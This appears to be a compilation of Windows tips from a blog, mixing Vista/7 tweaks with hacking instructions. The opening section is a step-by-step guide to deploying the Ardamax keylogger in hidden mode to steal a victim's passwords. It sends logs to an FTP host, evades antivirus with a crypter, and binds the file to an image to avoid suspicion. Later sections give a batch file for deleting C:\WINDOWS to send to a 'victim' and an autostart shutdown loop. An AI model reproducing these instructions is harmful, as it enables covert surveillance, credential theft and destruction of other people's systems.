FIRST OF ALL , WHAT IS A KEYLOGGER ?
A Keylogger is a software that records and captures everything you do on a system
e.g RECORDING KEYSTROKES,CAPTURING SCREENSHOTS,RECORDING CHAT CONVERSATIONS AND SO ON.

Ardamax keylogger - Hack passwords:

1. Free download Ardamax key-logger to hack password.

2. The downloaded file is zipped and password protected. The Password is techotips.blogspot.com

3. Download Winzix (free download here) to obtain Ardamax key-logger.

4. Now, after installing, you will get Ardamax log icon in task bar. Right click on it and select "Enter registration key" and make it full version by entering serial key from Serial key.txt file.

5. Go to http://www.drivehq.com and sign up for free FTP account. You need this to direct your key-logger logs and then access these logs. These are the logs that will give you desired passwords. After logging in your FTP account (make sure you are at Online Storage), create a new folder with name "LOGS".

Update: Some of readers have reported (via comments) drivehq.com not working for them. If you're having same problem, try out http://www.esmartstart.com/. I've personally tested it to be working and also easy to use. After signing up, log in to your file manager and create new folder "LOGS". Also, you need to click on "Enable FTP Access". Read confirmation email that you'll receive after sign up for more information.

Update 2: drivehq.com is working if new folder is named either "LOGS" or "logs". It is supporting either caps or no caps.

6. Now, right click on Ardamax task bar icon and select "Remote Installation".

7. Click on "Next" to get Appearance screen. Here, click on "Additional components" and untick "Log Viewer" and hit Next.

8. Now, on Security screen, click on "Enable" and put the password (remember this pass- you'll need this later). Check all boxes and hit Next.

9. On Web Update screen, simply click Next.

10. Now, you come to Options, and select apt options as you need. eg: It is better to have key-logger run in Stealth mode - so tick "Start in hidden mode" and so on. Click on Next.

11. On "Control" screen, check the box "Send log every" and put time as 30 minutes. Then, in delivery, uncheck "Email" and check "FTP". Leave Include as it is. And uncheck "Send only if log size exceeds". Proceed with "Next".

12. Now, on FTP, enter as below:
FTP Host: ftp.drivehq.com
Remote folder: LOGS (the one you've created in Step 4)
User name and password: Enter your FTP User name and pass (from Step 4).

Update: If you've used http://www.esmartstart.com/ as ftp server host, you have to insert ftpserver.esmartdesign.com as FTP Host.

13. In "Control" check every box and hit "Next".

14. In Screen-shots screen, you can put your own values and hit "Next" to come to Destination. Choose the Key-logger Engine path where you want to put the key-logger on your computer. Untick "Open the folder containing the key-logger engine" to avoid yourself from being key-logged. Choose the icon you want to use for key-logger. Now, click "Next" and then "Finish".

15. Now, when you have key-logger engine ready. But, this is detected by anti-virus as hack-tool and so we have to bypass antivirus detection. For this, key-logger is crypted using FUD Crypter. I will not talk about this over here as I have written article on this FUD Crypter. After crypting, you need to bind this crypted key-logged file with say image or any song for further protection and prevent victim doubt.

Note: Your anti-virus may detect the downloaded Ardamax key-logger file as virus. Please deactivate your anti-virus while installing this Ardamax key-logger. Don't worry, I never play such cheap pranks of hacking my readers.

Freeze someone's desktop

this is a funny trick, u can freeze someone's desktop
1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now in the desktop, we have 2 remove desktop icons and shortcuts, so right click on the mouse and then properties, click on desktop then select customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now to remove the shortcuts in the desktop, go to start and select My Computer, then click on c: right click on ur mouse and select new folder, write it any name
6.now go to desktop & select all da icons and right click on them then press cut,go to c: and paste them in the folder dat u created then close the window.

VERY EASY BUT DANGEROUS VIRUS

The only thing you need is Notepad .
Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.

Ok first of all this is not a virus even in the lamest terms. This is just a DOS batch file. You can also save the file as .bat file and the functioning will be the same. This file won't erase anything without confirmation from the user. You've tried to delete just a single file thats why it didn't ask for confirmation from you. Try deleting a folder with this file and you will get the following message in a DOS window:

Unless you press 'y' nothing will happen. A virus, by definition, is not just supposed to damage a computer, it is also supposed to spread on its own. And this file can't even damage a computer without affirmation from the user. I wonder who would be dumb enough to affirm the destruction of his own computer.
Atleast use "echo off" before the erase statement to hide the "erase c:\windows" command being displayed.
And by the way, I think you haven't ever used Linux. Otherwise you would know that Linux doesn't support DOS commands and neither does it use the Windows/DOS filesystem.

Find out about your computer's ability to run Vista features, especially Aero Graphics.
Windows Experience Index
Level 1 at least one sub-system needs upgrading.
Level 2 very basic system.
Level 3 systems runs Aero well, suitable for Word-processing and email.
Level 4 systems will play HD video.
Level 5 systems delivers any Windows Vista scenario, especially good for gaming.
Level 6 is impossible! 5.9 is the highest rating!
To discover your Vista machine's WinSat rating
Launch the Control Panel, System and Maintenance --> Performance Information and Tools.

There is a command line version of the Windows System Assessment Tool called WinSat. It tests the same components as the GUI version namely, Processor, Memory, Graphics and Disk.

b) Reliability Monitor

Check how well your machine has been running. Look back over the last week or ten days and see which factors have affected your Reliability Index. My best score was 9.81. Between 5 and 6 is my more usual score.
Vista Start button, click Start Search, type perfmon. When the Reliability and Performance Monitor finishes initializing, select, Reliability Monitor.

Environment Variable: To Troubleshoot 'Phantom' Devices

Problem: You cannot see the device you wish to configure in the Device Manager. Here are examples of where this could be a problem, troubleshooting a USB device, a docking station, or possibly a non plug and play device. Even clicking on the View menu and selecting Show hidden devices makes not difference, the devices don't appear.
Solution: Open the System Properties, Advanced (Tab) and click on Environmental Variables. What you want is a New.. System Variable.
Set Variable name = DevMgr_Show_NonPresent_Devices
Set Variable value = 1
Note 1: Use the plural NonPresent_DeviceS.
Note 2: Add to the System variables, and not the User variable section.

I have twice used this DevMgr_Show_NonPresent_Devices technique to fix printers that did not install properly.

log trick !! make ur Notepad a diary !!

Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

WHY?

The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

Changing Header and Footer

Ever printed the little text you wrote in Notepad? More often than not, the printout starts with “Untitled” or the filename at top, and “Page 1″ on bottom. Want to get rid of it, or change it? Click on File, Page Setup. Get rid of the characters in Header and Footer boxes, and write what you want as Header and Footer. Use the following codes.

&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number

Print tree root

a. Open NOTEPAD and enter {print tree root}
b. After that hit enter and type C:\windows\system

CMD BASICS

Lets learn how to make the computer shut down everytime it's booted, shall we?

First open CMD,

Next open notepad.

If you write "start shutdown -r" in CMD and press enter, your computer will restart. Also if you write the same in "run".
(Change -r to -s to shutdown computer, or write -l to logg off.)

in notepad and save it as something.bat (bat is important) and then open it, your computer will restart in the same way.

So, lets get into autostart. Put that bat file in autostart (autostart can be found in start menu) and each time your
computer is booted it will start that file and your computer will restart.
If you write the next script your computer will try to shutdown several times at once. it will freak for about half a minute
and then turn off.

Lets get a better understanding how scripts works. The above script shuts down your computer, but a bat file normaly opens
CMD and does whatever you told it to do.

@echo off - This is where you put commands that shouldn't be shown as text. For example cls. You don't want that to be text,
it's a command.

cls - This one is pretty good, it clears the text in the CMD screen

CMD - This command gives you a new CMD session.

start - this triggers stuff, in this case it's shutdown.

color - changes the colour in the cmd window, I recommend writing "color 0a", which is a green color thats really cool
on a black window.

title - write "title something" to change title.

goto :a - This one is really, really, really, really cool. It's used for making loops and some more advanced stuff that I
wont go into. Lets say you write

The goto :a tells you to go to :a higher up in the script. so it starts the script again, then it does the goto :a command
again and the script reloads. Basicaly a loop. You can change the "a" to whatever you want, for example "error". This is
only to make it easier for you to read your script.

The : infront of "a" must stay where it is.
Bad example:
goto: a

Good example:
goto :a

dir - This shows you the files in the directory you are in.

dir /s - This shows you all the files on your computer.

echo - write "echo something" and it will be as a text in cmd.

echo. This is a linebrake.

cd - Write cd followed up with a location, to go there in cmd. For example "cd c:\windows".

cd .. - This goes back one step in the directory. For example if your in c:\windows and write "cd .." you go back to c:\.

So now you know the basics, which we'll use to make you computer do stuff. In cmd you can write "help" to get a list of most
commands.

Moving away from learning commands now.

VISTA TWEAKS AND TRICKS

Every operating system could stand some tweaking. No matter how many developers you throw at an OS as complicated as Windows Vista, power users will always find something they can modify or hack to make it run faster, or better, or just differently. Here are just a few of the Windows Vista tweaks, tricks, and hacks we have discovered so far.
1: Add the Run command to the Start Menu

Beginning way back with the release of Windows 1.0, Microsoft has been all about the GUI interface (more or less effectively). But sometimes you just want to run a program without having to navigate the GUI maze of menus and folders. Windows Vista, by default, does not include the Run command on the Start Menu. This was a common and favorite feature of Windows XP.

To add the Run command back to the Vista Start Menu, follow these steps:

1. Right click the Taskbar in an open area
2. Click on Properties

Click on the Start Menu tab (See Figure A)

3. Click the Customize button to get to the Customize Start Menu

Scroll down the list until you find the Run command checkbox and check it (See Figure B).

4. Click OK and the Run command will now appear on the Start Menu.

2. Disable the Welcome Center and Sidebar

The Windows Vista default setting is to show the Welcome Center on startup. While the Welcome Center is mildly interesting the first time you see it, you will quickly tire of it appearing every time you boot your Vista PC. This behavior is easily changed by unchecking the Run a Startup button located at the bottom of the Welcome Center as shown in Figure C.

Similarly, the Vista Sidebar is also on by default. While some users will find the Sidebar and its widgets useful, many will desire the desktop real estate and underlying resources for other more productive uses. You can turn the Sidebar off by:

1. Right clicking the Windows Sidebar icon in the system tray
2. Click Properties
3. Uncheck the Start Sidebar when Windows starts checkbox (See Figure D)
4. Click OK

3: Change the Product Key

A Windows Vista installation disk essentially has all of the various editions of Vista included on that one disk. Which version gets installed is dependent on what product key you enter during the installation process. At some point you may want to upgrade your current version to a version with more bells and whistles, which would require a new Product Key.

Or you may want to Activate your Windows Vista under a different Product Key for some reason. The easiest way to change your Product Key is through the System applet in the Control Panel. (See Figure E)

Under the Windows Activation section there is a link: Change Product Key. Clicking that link brings up the screen shown in Figure F where you can enter in a different Product Key.

4: Start Windows Explorer at somewhere other than documents

While Windows Vista has desktop search that will theoretically allow you the option of merely typing in a location on your hard disk to get an Explorer view, some users will undoubtedly prefer to use Windows Explorer. By default, Windows Explorer in Vista shows you the files located in the user Documents folder. Follow these steps to have Windows Explorer start in a different folder:

1. Copy the Windows Explorer shortcut, usually found in the Start Menu under Accessories, to the Desktop.
2. Right click the shortcut and click properties.

Click on the Shortcut tab to get the window shown in Figure G.

3. Change the Target filed to the desired location.

For example, to have Windows Explorer start at C:\ type in"
C:\Windows\explorer.exe /n, /e, c:\

4. Click OK

5: Privacy tweak

As a convenience, Windows Vista by default saves and displays a list of recently opened files and programs on the Start Menu. Ostensibly, this is supposed to make it easier to find a file or program. However, many users would prefer that information to remain hidden. Here is how to turn it off:

1. Right click the Taskbar and click Properties on the resulting menu
2. Click the Start Menu tab

Uncheck the checkboxes under Privacy (See Figure H)

3. Click OK

6: Smaller icons on Start Menu

The icons located on the Windows Vista Start Menu default to large (Figure I).

For many users, the personal preference will be for those icons to be much smaller. Here is how:

1. Right click the Taskbar and click on Properties
2. Click the Start Menu tab
3. Click the Customize button
4. Scroll down to the bottom of the list (See Figure J)
5. Uncheck the Use large icons checkbox
6. Click OK twice

7. Add Internet Explorer to the Vista Desktop

For some reason known only to the Windows Vista development team, there is no easy option to add the Windows Explorer icon to the Vista Desktop. You can add Computer, Recycle Bin, and the Control Panel --- perhaps someone can explain that to us. In the meantime, if you want to add Internet Explorer you can do it with a Registry hack. Before editing the Windows Registry it is always advisable to make a backup of the Registry file.

1. Click the Start button
2. Open the Run dialog box (or type regedit in to the search box on the Start Menu)
3. Type in regedit and press Enter
4. Navigate to the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
5. Create a new DWORD 32-bit by right clicking in the key area (See Figure K)
6. Copy this as the key name including the brackets:
{871C5380-42A0-1069-A2EA-08002B30309D}
7. Close regedit
8. Right click on the Desktop and click the Refresh menu entry --- Internet Explorer should now appear.

8: Change Security Center notifications

One of the most often leveled criticisms of Windows has been its lack of security. To overcome that perception Microsoft had programmed Vista to complain loudly and often if it discovers your malware, firewall or virus protection software is off or requires maintenance. For many users, the constant badgering to update your virus definitions is more annoying then effective. To calm Vista down a bit you can change the way you are notified of potential lax security.

Open the control panel and click the Windows Security Center as shown in Figure L.

9: Set Folder options

One of the first things experienced users change when they get a new Windows computer is change the Folder View options to a preferred setting. Windows Vista is no exception to this rule.

1. Open the Control Panel and click on the Folder Options icon
2. Click on the View tab (See Figure N)

3. Check or uncheck your folder preferences --- some suggestions:
1. Check show hidden files and folders
2. Uncheck Hide extensions for known file types
3. Uncheck protected operating system files

10: Adjust power settings

By default, Windows Vista sets the power options to what it calls a "Balanced" plan. While for many users this plan will be adequate, there are many who will want to make adjustments. For laptop users specifically, settings can vary greatly when operating on battery power versus plugged into an outlet. To adjust power settings:

Open the Control Panel and then click the Power Options icon (See Figure O)

11: Reduce Desktop Icons

By default, the Windows Vista Aero GUI uses what it classifies as "Medium" icons on the Desktop. Medium in this case is really quite large. (There is also a Large icon setting, but we won't go there.) To bring the icons back to a less eye-popping size:

1. Right click on the Desktop
2. Choose the View menu item
3. Change to Classic Icons (Figure R)

12 Add another time zone

For many of us working away from home offices at satellite offices, home or on the road, knowing the time across various time zones can be a necessary evil. Windows Vista will allow you to keep time in two additional time zones to the machine time.

1. Right click on the time display located in Taskbar System Tray
2. Select the Adjust Date/Time menu item
3. Click on the Additional Clocks tab (See Figure S)

5. Click the checkbox next to Show this clock
6. Click OK

Now when you mouse over the time in the Taskbar System Tray you will get the time in your chosen time zones.

Add "Take Ownership" to Explorer Right-Click Menu in Win 7 or Vista

Taking ownership of system files or folders in Windows 7 or Vista is not a simple task. Whether you use the GUI or the command line, it takes far too many steps.

Thankfully somebody created a registry hack that will give you a menu item for “Take Ownership” that will handle all the steps for you. (If you are the person that originally made this script, let me know and I’ll give you credit)

Here’s what the new right-click menu will look like after installing this registry hack.

Download and unzip the files contained in the zipfile. Double-click the InstallTakeOwnership.reg file and click through the prompts. No reboot necessary.

Activate Flip 3D With Your Mouse in Vista

Over the last few years I’ve had many people ask me if they can somehow activate Flip 3D by moving the mouse to a corner of the screen, and I’ve always told them to use the much more powerful Switcher replacement instead, but that’s about to change.

The solution to this problem comes in the form of a tiny little application called Vista Flip 3D Activator, and it lets you assign a corner of the screen to activate Flip 3D, providing you haven’t disabled Flip 3D like I have.

Installing the application is as simple as downloading and extracting the program file and running through the install wizard. Once you’ve done that, you can then check the corner of the screen that you’d like to use for activating Flip 3D…

You can also assign a mouse button if you want, although you should note that it doesn’t override IntelliMouse settings. Once you’ve activated Flip 3D, you can use your mouse wheel to scroll between the different windows, and then click to activate.

Note: for those of you that might be wondering, you can make Flip 3D stay on the screen without using any software by either clicking the “Window Switcher” icon in the Quick Launch (second to the left), or you can use the keyboard shortcut Win+Ctrl+Tab to make it stay on the screen. When it comes down to it, this utility really only saves clicking on the Quick Launch icon.

4 WAYS TO MAKE UAC LESS ANNOYING ON WINDOWS VISTA / 7

The single biggest irritation in Windows 7 and Vista is the UAC (User Account Control) system, especially for people that do a lot of tweaking. When you are trying to make configuration changes, it seems like every couple of seconds you are hitting another UAC prompt. Sure, it’s more secure… but what options do we have to make it less annoying?
There are at least 4 different ways that we can tweak UAC to be less annoying, most of which I’ve written about before.
Note: Disabling or modifying UAC is a security risk. If you want to be as secure as possible, you should likely leave things alone.

1) Disable UAC Entirely

The first thing that you can always do is completely disable UAC… the only problem with this is that you’ll end up making the system less secure if you are also the type of person that downloads and tests a lot of software. I can’t recommend that you do this, but at least you know that you have the option to.

2) Auto-Accept UAC Prompts for Administrators Only
If you want to leave UAC enabled, but disable the prompts from showing up under your administrator account, you can tweak a setting that will “Elevate without prompting”, so you never see the prompt show up. This is more secure than disabling UAC entirely, because an application started as a regular user can’t perform an action that is meant for administrators. For instance, Internet Explorer can still run in protected mode this way.

3) Disable the Blackout Screen (Secure Desktop)
The most annoying part of UAC for me is the screen that blacks out everything other than the UAC prompt… because it usually takes forever to show up, and depending on your video card it can do weird things with your desktop. You can disable the secure desktop feature but leave the UAC prompts the way they are… of course this is potentially a security hole as well, since an application could fraudulently “click” the prompt for you. (Secure desktop prevents applications from doing this)

4) Create Administrator Mode Shortcuts Without UAC Prompts
Instead of disabling UAC in any way, what we can do is setup a few shortcuts that bypass UAC entirely. This is especially useful if you open a particular administrator-mode application a dozen times per day. The trick to this is using task scheduler to launch the applications, and then telling task scheduler to run the task. This is more secure than the other options, since only our special shortcut will bypass UAC.

Extra: Make sure to Install (at least) Vista Service Pack 1
If you haven’t already installed Service Pack 1 or later, you should make sure that you install it… one of the fixes included will limit the number of UAC prompts you have to click through to modify system files.
I’m curious what percentage of our readers have actually disabled UAC. I personally am using method #4, since it’s the best in terms of security, but also eliminating the annoyance for the couple of applications I launch a dozen times per day.
